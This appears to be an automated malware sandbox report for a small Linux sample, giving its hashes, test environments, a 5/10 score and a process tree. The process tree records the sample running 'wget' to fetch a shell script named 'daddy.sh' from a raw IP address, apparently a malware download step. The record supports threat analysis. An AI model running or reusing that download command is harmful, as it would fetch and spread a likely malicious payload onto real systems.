Overview

overview

5

Static

static

9a8ba67ca1...packed

ubuntu-18.04-amd64

5

9a8ba67ca1...packed

debian-9-armhf

5

9a8ba67ca1...packed

debian-9-mips

5

9a8ba67ca1...packed

debian-9-mipsel

5

Analysis

  • max time kernel
    27863s
  • max time network
    602s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    27-10-2022 04:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9a8ba67ca177dd0513b1fbef117ebe644a9deb0d6502cde4cb6aee6ec25a1e65_unpacked

  • Size

    1KB

  • MD5

    1351532f3ee97a1a114eb393e1bbe868

  • SHA1

    64efad552d0777c39bfc9f07cc54e3df808c56d6

  • SHA256

    9a8ba67ca177dd0513b1fbef117ebe644a9deb0d6502cde4cb6aee6ec25a1e65

  • SHA512

    3a1272ed778b9a239d9c673dfbfcd93fe8d2ca1eac034d113e91e217ea78572cc4977debd323186a48edd650e876800244bb5d01396a00c3ad3d5e14f305fb6a

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/9a8ba67ca177dd0513b1fbef117ebe644a9deb0d6502cde4cb6aee6ec25a1e65_unpacked
    /tmp/9a8ba67ca177dd0513b1fbef117ebe644a9deb0d6502cde4cb6aee6ec25a1e65_unpacked
    1⤵
    • Writes file to tmp directory
    PID:577
    • /usr/bin/wget
      wget http://209.141.45.139/daddy.sh
      2⤵
        PID:578

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads